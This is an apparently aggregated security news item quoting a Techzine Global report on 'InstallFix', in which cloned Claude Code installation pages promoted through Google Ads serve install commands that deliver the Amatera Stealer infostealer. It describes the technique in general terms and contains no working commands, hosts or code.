"Attackers clone installation pages of developer tools such as Claude Code and replace the install commands with malware instructions. The fake pages are virtually pixel-perfect copies of the official Claude Code installation page, including layout, branding, and documentation sidebar. However, the install commands do not refer to claude.ai but to a server owned by the attacker."
"The fake pages are distributed exclusively via Google Ads, in particular via sponsored search results. Searches such as 'Claude Code install' or 'Claude Code CLI' lead victims to the malicious pages. After interacting with the page, visitors are also redirected to the real site, which removes any suspicion."
"The malware installed via the fake commands is Amatera Stealer. This infostealer first appeared in 2025 and is considered the successor to ACR Stealer. Amatera steals browser data, cookies, session tokens, and system information. The malware communicates with its command-and-control server via hardcoded IP addresses of legitimate CDNs, which makes detection difficult."
Security researchers discovered InstallFix, a sophisticated attack technique where malicious actors create near-identical copies of legitimate developer tool installation pages, particularly Claude Code. These fake pages are distributed through sponsored Google search results, appearing when users search for installation instructions. The cloned pages contain malicious install commands that deploy Amatera Stealer, an infostealer malware that harvests browser data, cookies, session tokens, and system information. After execution, users are redirected to legitimate sites, reducing suspicion. The malware communicates through hardcoded IP addresses of legitimate CDNs like Cloudflare Pages and Squarespace, complicating detection. This technique improves upon ClickFix by requiring no social engineering pretext.
#malware-distribution #developer-tools-security #google-ads-abuse #amatera-stealer #phishing-techniques
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]